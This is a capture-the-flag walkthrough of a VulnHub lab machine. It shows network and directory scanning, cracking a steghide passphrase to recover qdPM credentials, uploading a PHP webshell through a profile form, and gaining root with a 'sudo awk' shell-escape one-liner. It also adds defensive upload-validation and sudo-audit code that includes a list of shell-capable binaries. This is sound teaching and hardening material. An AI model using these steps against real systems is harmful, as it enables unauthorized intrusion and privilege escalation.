Detailed approach
- `Key points`
- 1. Network discovery
- 2. nmap scan
- 3. Directory scan
- 4. Steganography
- 5. Uploading a webshell
- 6. awk privilege escalation
Key points
Image steganography -----> steghide
Passphrase brute force -----> stegseek
awk privilege escalation ------> sudo awk 'BEGIN {system("/bin/bash")}'
1. Network discovery
Kali: 192.168.0.131
Target: 192.168.0.134
```
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.0.131
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1 b8:3a:08:3b:f9:30 Tenda Technology Co.,Ltd.Dongguan branch
192.168.0.130 7c:b5:66:a5:f0:a5 Intel Corporate
192.168.0.134 08:00:27:45:31:d4 PCS Systemtechnik GmbH
192.168.0.128 9e:74:7d:ae:04:f7 (Unknown: locally administered)
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 1.998 seconds (128.13 hosts/sec). 4 responded
```
2. nmap scan
```
┌──(root㉿kali)-[~]
└─# nmap -sV -O -sC 192.168.0.134 --min-rate 10000
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-22 00:54 EST
Nmap scan report for 192.168.0.134 (192.168.0.134)
Host is up (0.0056s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6afed61723cb90792bb12d3753974658 (RSA)
| 256 5bc468d18959d748b096f311871c08ac (ECDSA)
|_ 256 613966881d8ff1d040611e99c51a1ff4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: qdPM | Login
MAC Address: 08:00:27:45:31:D4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.35 seconds
```
Port 80 is open and serves Apache with a login page (qdPM); weak-password brute forcing against it yielded nothing.
3. Directory scan
```
┌──(root㉿kali)-[~]
└─# dirsearch -u "http://192.168.0.134" -x 403,500
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /root/reports/http_192.168.0.134/_24-02-22_00-58-27.txt
Target: http://192.168.0.134/
[00:58:27] Starting:
[00:58:28] 301 - 311B - /js -> http://192.168.0.134/js/
[00:58:43] 301 - 316B - /backups -> http://192.168.0.134/backups/
[00:58:43] 200 - 407B - /backups/
[00:58:45] 200 - 0B - /check.php
[00:58:47] 301 - 313B - /core -> http://192.168.0.134/core/
[00:58:47] 301 - 312B - /css -> http://192.168.0.134/css/
[00:58:51] 200 - 894B - /favicon.ico
[00:58:54] 200 - 648B - /images/
[00:58:54] 301 - 315B - /images -> http://192.168.0.134/images/
[00:58:54] 200 - 2KB - /index.php
[00:58:55] 200 - 2KB - /index.php/login/
[00:58:55] 301 - 316B - /install -> http://192.168.0.134/install/
[00:58:55] 200 - 762B - /install/index.php?upgrade/
[00:58:55] 200 - 762B - /install/
[00:58:56] 200 - 607B - /js/
[00:59:07] 200 - 338B - /readme.txt
[00:59:08] 200 - 26B - /robots.txt
[00:59:09] 301 - 315B - /secret -> http://192.168.0.134/secret/
[00:59:09] 200 - 461B - /secret/
[00:59:14] 200 - 502B - /template/
[00:59:14] 301 - 317B - /template -> http://192.168.0.134/template/
[00:59:16] 301 - 316B - /uploads -> http://192.168.0.134/uploads/
[00:59:16] 200 - 476B - /uploads/
Task Completed
```
In the /secret directory there is a suspicious image (its name matches the target machine's, so it is probably a hint).
4. Steganography
steghide is a command-line tool for hiding and extracting data; it is commonly used for steganography, embedding data inside image and audio files.
Extraction requires a passphrase, so we brute-force it with stegseek.
stegseek is a tool for recovering data hidden in images with steghide. It tries candidate passphrases from a wordlist until one decrypts the embedded payload.
```
┌──(root㉿kali)-[~/kali/vulnhub/doublerouble]
└─# stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt -xf out
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "92camaro"
[i] Original filename: "creds.txt".
[i] Extracting to "out".
┌──(root㉿kali)-[~/kali/vulnhub/doublerouble]
└─# cat out
otisrush@localhost.com
otis666
```
This gives us a username and password; log in with them.
5. Uploading a webshell
Once in the backend, the first thing to look for is a PHP page that can be edited or a place that accepts file uploads. The profile edit form (top right corner) accepts a PHP file; although an error is shown after the upload, the file can be seen in /uploads/user, so the upload succeeded.
https://www.revshells.com/
It generates reverse shell payloads automatically, which is convenient.
The reverse shell connects back successfully.
6. awk privilege escalation
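The upload step works because the profile form accepts a `.php` file and stores it under a web-served directory. The following is an added example, not qdPM's code, showing the kind of server-side check that lets this through next to a hardened version: an extension allow-list, a magic-byte check on the content, and a server-chosen stored name so a user-supplied extension never reaches the filesystem. Function names, the allow-list and the sample inputs are assumptions constructed for the example.

```python
"""Server-side validation for an image upload (added example, not qdPM's code)."""
import os
import secrets

# Allow-listed image extensions and the magic bytes each type must start with.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def weak_upload_check(filename: str, content: bytes) -> bool:
    """The pattern that lets a .php file through: only non-emptiness is checked,
    so any name and any content are accepted and then written under /uploads."""
    return bool(filename) and bool(content)


def hardened_upload_check(filename: str, content: bytes) -> bool:
    """Accept only allow-listed extensions whose content matches the type."""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext not in ALLOWED_TYPES:
        return False
    # Content must carry the magic bytes of the claimed type; a PHP payload
    # renamed to .jpg fails here because it starts with "<?php", not FF D8 FF.
    return any(content.startswith(magic) for magic in ALLOWED_TYPES[ext])


def stored_name(filename: str) -> str:
    """Random server-chosen name with a canonical extension. The user's name,
    including any second extension such as shell.php.jpg, is discarded, so the
    web server never sees a .php suffix on the stored file."""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    canonical = "jpg" if ext == "jpeg" else ext
    return f"{secrets.token_hex(16)}.{canonical}"


if __name__ == "__main__":
    # Constructed sample uploads: a PHP file, the same content renamed, a real PNG.
    samples = [
        ("shell.php", b"<?php echo 1; ?>"),
        ("shell.php.jpg", b"<?php echo 1; ?>"),
        ("avatar.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ]
    for name, data in samples:
        print(name, "weak:", weak_upload_check(name, data),
              "hardened:", hardened_upload_check(name, data))
```

Validation alone is not the whole fix: the upload directory should additionally be served with PHP execution disabled (for Apache, a `php_admin_flag engine off` or a handler removal for that directory), so that even a file that slips through is returned as static bytes rather than executed.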
```
www-data@doubletrouble:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on doubletrouble:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on doubletrouble:
(ALL : ALL) NOPASSWD: /usr/bin/awk
www-data@doubletrouble:/$ sudo awk 'BEGIN {system("/bin/bash")}'
sudo awk 'BEGIN {system("/bin/bash")}'
id
uid=0(root) gid=0(root) groups=0(root)
```
https://gtfobins.github.io/gtfobins/awk/
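The root shell above comes from a single sudoers line: a NOPASSWD rule for a binary that can spawn a shell from inside itself. The following is an added audit helper, not part of this walkthrough, that parses the output of `sudo -l` and flags exactly that pattern so it can be caught during a host review before an attacker finds it. The sample output is constructed from the lines in the transcript above plus two invented rules; the list of shell-capable binaries (awk from this box, the rest well-known GTFOBins entries) and all function names are assumptions.

```python
"""Flag NOPASSWD sudo rules for shell-capable binaries (added audit example)."""
import re

# Binaries known to spawn a shell from within. awk is the one used on this box;
# the others are well-known entries on gtfobins.github.io. Extend as needed.
SHELL_CAPABLE = {
    "awk", "gawk", "vim", "vi", "find", "less", "more",
    "python", "python3", "perl", "bash", "sh",
}

# One sudoers rule line as printed by `sudo -l`: "(runas) TAG: TAG: cmd, cmd".
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")


def parse_sudo_l(output: str) -> list[dict]:
    """Return one dict per rule in the 'may run the following commands' block,
    with keys runas (str), tags (set of str), commands (list of str)."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        match = RULE_RE.match(line)
        if not match:
            continue
        runas, tags, cmds = match.groups()
        rules.append({
            "runas": runas.strip(),
            "tags": {t.strip(": ") for t in tags.split() if t.strip(": ")},
            "commands": [c.strip() for c in cmds.split(",")],
        })
    return rules


def find_risky(rules: list[dict]) -> list[str]:
    """Commands granted without a password that are ALL or a shell-capable binary."""
    risky = []
    for rule in rules:
        if "NOPASSWD" not in rule["tags"]:
            continue
        for cmd in rule["commands"]:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or binary in SHELL_CAPABLE:
                risky.append(cmd)
    return risky


# Constructed sample: the transcript's real rule plus two invented ones.
SAMPLE_SUDO_L = r"""Matching Defaults entries for www-data on doubletrouble:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on doubletrouble:
    (ALL : ALL) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/vim, /bin/ls
    (root) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for cmd in find_risky(parse_sudo_l(SAMPLE_SUDO_L)):
        print("RISKY NOPASSWD rule:", cmd)
```

The fix for the flagged rule is to remove the NOPASSWD grant or, if www-data genuinely needs awk under sudo, to restrict it to a fixed script path with fixed arguments rather than the bare interpreter; a web server account should normally have no sudo rights at all.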